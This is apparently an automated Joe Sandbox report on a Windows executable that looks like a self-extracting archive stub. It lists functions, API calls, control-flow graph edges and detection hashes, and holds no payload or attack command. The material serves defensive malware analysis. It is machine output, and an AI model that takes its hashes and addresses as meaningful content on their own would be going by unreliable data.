                                                                                                                                                                                                                                                        control_flow_graph 2299 7ff6063846a0-7ff6063846db 2300 7ff6063846dd-7ff6063846e4 2299->2300 2301 7ff6063846e6 2299->2301 2300->2301 2302 7ff6063846e9-7ff606384758 2300->2302 2301->2302 2303 7ff60638475d-7ff606384788 CreateFileW 2302->2303 2304 7ff60638475a 2302->2304 2305 7ff606384868-7ff60638486d 2303->2305 2306 7ff60638478e-7ff6063847be GetLastError call 7ff6063880b0 2303->2306 2304->2303 2307 7ff606384873-7ff606384877 2305->2307 2315 7ff60638480c 2306->2315 2316 7ff6063847c0-7ff60638480a CreateFileW GetLastError 2306->2316 2309 7ff606384879-7ff60638487c 2307->2309 2310 7ff606384885-7ff606384889 2307->2310 2309->2310 2312 7ff60638487e 2309->2312 2313 7ff60638488b-7ff60638488f 2310->2313 2314 7ff6063848af-7ff6063848c3 2310->2314 2312->2310 2313->2314 2317 7ff606384891-7ff6063848a9 SetFileTime 2313->2317 2318 7ff6063848ec-7ff606384915 call 7ff6063a5c30 2314->2318 2319 7ff6063848c5-7ff6063848d0 2314->2319 2320 7ff606384812-7ff60638481a 2315->2320 2316->2320 2317->2314 2322 7ff6063848e8 2319->2322 2323 7ff6063848d2-7ff6063848da 2319->2323 2324 7ff60638481c-7ff606384833 2320->2324 2325 7ff606384853-7ff606384866 2320->2325 2322->2318 2327 7ff6063848dc 2323->2327 2328 7ff6063848df-7ff6063848e3 call 7ff606381c80 2323->2328 2329 7ff606384835-7ff606384848 2324->2329 2330 7ff60638484e call 7ff6063a5b1c 2324->2330 2325->2307 2327->2328 2328->2322 2329->2330 2333 7ff606384916-7ff60638491b call 7ff6063aae94 2329->2333 2330->2325
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: File$CreateErrorLast$Time_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3536497005-0
                                                                                                                                                                                                                                                        • Opcode ID: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                                                                                                                                                                                                                                        • Instruction ID: 923ab4a6aaf9be804d910102bff16ab68ac9288b7d93f22d7cbd631e1650564d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f2a95c046f384fb88cb42bad2343db76857be23356c2a59daf525ee97aa7854a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B961F976A1878185E7288B29E54036E67A1F7857B8F202334DF6D83AE5DF7ED054C780
                                                                                                                                                                                                                                                        Function 00007FF60638E7C0 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2092733347-0
                                                                                                                                                                                                                                                        • Opcode ID: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                                                                                                        • Instruction ID: 89bf90f96cae7bf7c29ac993ea95c20b552a53de257a8353d242c57b06723207
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7415bec7d798ad501b197d19bbfbfb4fb824aa0f8bac73e46940edbbb5db9b65
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA311962B10A51DEFB04CFB5D8801AC7770FB18758B64602AEF0EA7A68EF38D595C744
                                                                                                                                                                                                                                                        Function 00007FF6063A3810 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 2346 7ff6063a3810-7ff6063a383b 2347 7ff6063a3840-7ff6063a387a SetEnvironmentVariableW call 7ff60638cf98 2346->2347 2348 7ff6063a383d 2346->2348 2351 7ff6063a38c7-7ff6063a38cf 2347->2351 2352 7ff6063a387c 2347->2352 2348->2347 2353 7ff6063a38d1-7ff6063a38e7 2351->2353 2354 7ff6063a3903-7ff6063a391e call 7ff6063a5c30 2351->2354 2355 7ff6063a3880-7ff6063a3888 2352->2355 2356 7ff6063a38fe call 7ff6063a5b1c 2353->2356 2357 7ff6063a38e9-7ff6063a38fc 2353->2357 2359 7ff6063a388a 2355->2359 2360 7ff6063a388d-7ff6063a3898 call 7ff60638d3b8 2355->2360 2356->2354 2357->2356 2361 7ff6063a391f-7ff6063a3927 call 7ff6063aae94 2357->2361 2359->2360 2367 7ff6063a38a7-7ff6063a38ac 2360->2367 2368 7ff6063a389a-7ff6063a38a5 2360->2368 2370 7ff6063a38ae 2367->2370 2371 7ff6063a38b1-7ff6063a38c6 SetEnvironmentVariableW 2367->2371 2368->2355 2370->2371 2371->2351
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID: sfxcmd$sfxpar
                                                                                                                                                                                                                                                        • API String ID: 3540648995-3493335439
                                                                                                                                                                                                                                                        • Opcode ID: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                        • Instruction ID: 890e6c047d1896581ad0eea8974c8fc778145e776c10daebc527728c20bb8003
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a57c69db1c650ffc0109058ee75098a0d594147db01f3cd247ccf932cb967a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB316F72E14B5684FF088B69D8841AC6371EB44B98F242135DE5ED7AA9CE39D185C380
                                                                                                                                                                                                                                                        Function 00007FF60639EB64 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadBitmapW.USER32 ref: 00007FF60639EB7A
                                                                                                                                                                                                                                                        • GetObjectW.GDI32 ref: 00007FF60639EBAB
                                                                                                                                                                                                                                                        • DeleteObject.GDI32 ref: 00007FF60639EBE5
                                                                                                                                                                                                                                                        • DeleteObject.GDI32 ref: 00007FF60639EC15
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: FindResourceExW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C279
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C295
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C2AF
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,00001000,00007FF6063A4517), ref: 00007FF60639C2C1
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalAlloc.KERNELBASE ref: 00007FF60639C2E2
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalLock.KERNEL32 ref: 00007FF60639C2F7
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: CreateStreamOnHGlobal.COMBASE ref: 00007FF60639C324
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GdipCreateHBITMAPFromBitmap.GDIPLUS ref: 00007FF60639C3A5
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalUnlock.KERNEL32 ref: 00007FF60639C3C8
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF60639C260: GlobalFree.KERNEL32 ref: 00007FF60639C3D1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                                                                                                                                                        • String ID: ]
                                                                                                                                                                                                                                                        • API String ID: 1797374341-3352871620
                                                                                                                                                                                                                                                        • Opcode ID: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                                                                                                        • Instruction ID: e764a1556612846481d70e271ebed92a8bcece19c25f17c55707e67ec2ce9fb4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4bf2bc35f3b21ea03de476389abc0e83db34e9447328c44d88c742213a9449e8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F411B920B0D74641EA1CDB51D65427953A1EF89BC8F682034DD4E87BC9EE3EEC048EA0
                                                                                                                                                                                                                                                        Function 00007FF60639E96C Relevance: 7.5, APIs: 5, Instructions: 27windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Message$DialogDispatchPeekTranslate
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1266772231-0
                                                                                                                                                                                                                                                        • Opcode ID: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                        • Instruction ID: 86fa8839dbafd1997213c79e797dfcfede5c2c931cd79b874171ae9880e23472
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e45bfd896b69646a0b5eeb10867a712a562e5ff66da3ebe7d8c5d592be84918c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68F09626B3855282FB98DBA0F855B362361FFD0709F907035E64EC1894EF6DD508CB50
                                                                                                                                                                                                                                                        Function 00007FF6063953BC Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 2400 7ff6063953bc-7ff606395402 call 7ff606384a70 2401 7ff606395408-7ff606395415 2400->2401 2402 7ff606395665 2401->2402 2403 7ff60639541b-7ff60639541e 2401->2403 2405 7ff606395667-7ff60639568e call 7ff6063a5c30 2402->2405 2403->2402 2404 7ff606395424-7ff606395427 2403->2404 2404->2402 2406 7ff60639542d-7ff606395436 2404->2406 2406->2402 2408 7ff60639543c-7ff606395445 2406->2408 2408->2402 2410 7ff60639544b-7ff606395485 call 7ff606386288 2408->2410 2413 7ff606395492-7ff6063954a9 2410->2413 2414 7ff606395487-7ff60639548b 2410->2414 2415 7ff606395501-7ff606395508 2413->2415 2416 7ff6063954ab-7ff6063954b2 2413->2416 2414->2413 2417 7ff606395512-7ff60639551c 2415->2417 2418 7ff60639550a-7ff60639550d call 7ff606391dd0 2415->2418 2416->2417 2419 7ff6063954b4-7ff6063954ff call 7ff606391bf4 call 7ff6063aaf0c call 7ff6063812bc call 7ff606388d18 2416->2419 2421 7ff60639551e-7ff606395526 2417->2421 2422 7ff60639552f-7ff606395542 call 7ff606394e68 2417->2422 2418->2417 2419->2417 2421->2422 2428 7ff606395548-7ff606395598 call 7ff6063aaf0c call 7ff6063812bc call 7ff606390114 2422->2428 2429 7ff60639562d-7ff606395635 2422->2429 2450 7ff60639559a-7ff6063955ac 2428->2450 2451 7ff6063955cc-7ff6063955ec 2428->2451 2429->2402 2433 7ff606395637-7ff606395649 2429->2433 2436 7ff606395660 call 7ff6063a5b1c 2433->2436 2437 7ff60639564b-7ff60639565e 2433->2437 2436->2402 2437->2436 2440 7ff60639568f-7ff606395694 call 7ff6063aae94 2437->2440 2447 7ff606395695-7ff60639569b call 7ff6063aae94 2440->2447 2453 7ff6063955ae-7ff6063955c1 2450->2453 2454 7ff6063955c7 call 7ff6063a5b1c 2450->2454 2457 7ff6063955ee-7ff6063955f6 2451->2457 2458 7ff60639562b 2451->2458 2453->2447 2453->2454 2454->2451 2459 7ff606395626-7ff606395629 2457->2459 2460 7ff6063955f8-7ff60639560a 2457->2460 2458->2429 2459->2405 2461 7ff606395621 call 7ff6063a5b1c 2460->2461 2462 7ff60639560c-7ff60639561f 2460->2462 2461->2459 2462->2440 2462->2461
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF60639568F
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606395695
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606386288: FindClose.KERNELBASE(?,?,?,00007FF60638FFA5), ref: 00007FF6063862BD
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606391DD0: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF606391E25
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseFindswprintf
                                                                                                                                                                                                                                                        • String ID: zip$zipx
                                                                                                                                                                                                                                                        • API String ID: 2713956076-1268445101
                                                                                                                                                                                                                                                        • Opcode ID: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
                                                                                                                                                                                                                                                        • Instruction ID: 0cbf821f6ab5cffc6f3e156aace09b5ba89f829ef1db94506b2e7ae77d2b68eb
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c43c1b66e07d995b1cbb6a2f2b962e78e60540c5e6c8088aa3c6015e6fa861f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2781C362F09B0285FA18DB65E8441BC2361EF44BA8F607235DE1D937D5EE3EE486C790
                                                                                                                                                                                                                                                        Function 00007FF60639CE24 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                                                                                                                                                                                        • String ID: EDIT
                                                                                                                                                                                                                                                        • API String ID: 4243998846-3080729518
                                                                                                                                                                                                                                                        • Opcode ID: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                        • Instruction ID: 8c54e850fe4fb407c46767deb4db424484899b65224e85824b844e033f305dd3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97649a043c3252f54d481027b362a8cb3c0219486fdf1255c1e6258ed32498fa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8201A961F08A4741FF289721F821775A350FF98754F543035C94E87695EF6ED544CBA0
                                                                                                                                                                                                                                                        Function 00007FF606384E18 Relevance: 6.1, APIs: 4, Instructions: 136fileCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileWrite$Handle
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4209713984-0
                                                                                                                                                                                                                                                        • Opcode ID: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                        • Instruction ID: 5f928d0adbae1934edcfb11342f9ad345fdfec7466dc00576ad2a355813a35f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 407f625d59d604b924eb6a4f57d6f6a75d77dcc3e5834d4536d90adbb701eae7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2B51FA22B19B4396EA58CB15D5443B96390FF54B94F203135EA0EC7AE5DF7EE444C380
                                                                                                                                                                                                                                                        Function 00007FF606390120 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$TextWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2912839123-0
                                                                                                                                                                                                                                                        • Opcode ID: 7694a187f42c39eb567f0629a824896409d32d05266dde82731a683b3aad9840
                                                                                                                                                                                                                                                        • Instruction ID: 9320feddda3ee4e5460d6edeedc7564ed141f28c385970fe14807d137df2f080
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7694a187f42c39eb567f0629a824896409d32d05266dde82731a683b3aad9840
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DA51AE72F1479184FF089BA5D8452AD2322AF44BA4F602636DA1C97BE6DE7EE440D380
                                                                                                                                                                                                                                                        Function 00007FF6063A653C Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1452418845-0
                                                                                                                                                                                                                                                        • Opcode ID: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                        • Instruction ID: 30cec888d239690c4c22abe956a1a35a2fec473797a25c0b11d6c2b2a4b08fd7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82ea77dc686828d8d4b6b6f5dd528249c478d0f7ec0ca3c5a3cf5b807b775c11
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E2314F31E0C50385FE1CAB6595533B962919F42344F687438D64ECB2E7DE2FB805A2D5
                                                                                                                                                                                                                                                        Function 00007FF606385C60 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
